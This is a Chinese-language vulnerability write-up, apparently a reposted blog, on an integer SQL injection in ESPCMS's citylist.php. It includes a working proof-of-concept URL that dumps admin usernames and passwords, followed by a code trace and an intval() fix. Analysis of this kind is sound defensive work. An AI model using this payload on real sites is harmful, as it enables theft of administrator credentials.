ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul-白红宇

ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul

阅读量：397 次

发布时间：2019-03-05

本文共 3150 字，大约阅读时间需要 10 分钟。

catalog

1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. 漏洞描述

Relevant Link:

2. 漏洞触发条件

0x1: POC

http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20UNION%20select%201,2,concat%28name,0x7c,password%29,4,5%20FROM%20espcms_v6.espcms_admin_memberhttp://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(name,0x7c,password),4,5 FROM espcms_v6.espcms_admin_member

3. 漏洞影响范围

4. 漏洞代码分析

/adminsoft/control/citylist.php

class important extends connector {    function important() {        $this->softbase(true);    }    function oncitylist() {        //接收外部参数parentid        $parentid = $this->fun->accept('parentid', 'R');         $parentid = empty($parentid) ? 1 : $parentid;        $verid = $this->fun->accept('verid', 'R');        $verid = empty($verid) ? 0 : $verid;        $db_table = db_prefix . 'city';        $sql = "select * from $db_table where parentid=$parentid";        die(var_dump($sql));        $rs = $this->db->query($sql);        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {            if ($verid == $rsList['id']) {                $list.='';            } else {                $list.='';            }        }        exit($list);    }}

继续跟进$parentid = $this->fun->accept('parentid', 'R');

/public/class_function.php

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {        switch ($var) {            case 'G':                $var = &$_GET;                break;            case 'P':                $var = &$_POST;                break;            case 'C':                $var = &$_COOKIE;                break;            case 'R':                $var = &$_GET;                if (empty($var[$k])) {                    $var = &$_POST;                }                break;        }        //对输入进行了addslash转义，但是对Int整型注入没有效果        $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL;         return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;    }

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0163605

5. 防御方法

/adminsoft/control/citylist.php

class important extends connector {    function important() {        $this->softbase(true);    }    function oncitylist() {        //接收外部参数parentid        $parentid = $this->fun->accept('parentid', 'R');         /**/        $parentid = intval($parentid);        /**/        $parentid = empty($parentid) ? 1 : $parentid;        $verid = $this->fun->accept('verid', 'R');        $verid = empty($verid) ? 0 : $verid;        $db_table = db_prefix . 'city';        $sql = "select * from $db_table where parentid=$parentid";        die(var_dump($sql));        $rs = $this->db->query($sql);        for ($i = 0; $rsList = $this->db->fetch_array($rs); $i++) {            if ($verid == $rsList['id']) {                $list.='';            } else {                $list.='';            }        }        exit($list);    }}

6. 攻防思考

转载地址：http://hjzkz.baihongyu.com/

你可能感兴趣的文章

【Struts】配置Struts所需类库详细解析

查看>>

Java面试题：Servlet是线程安全的吗？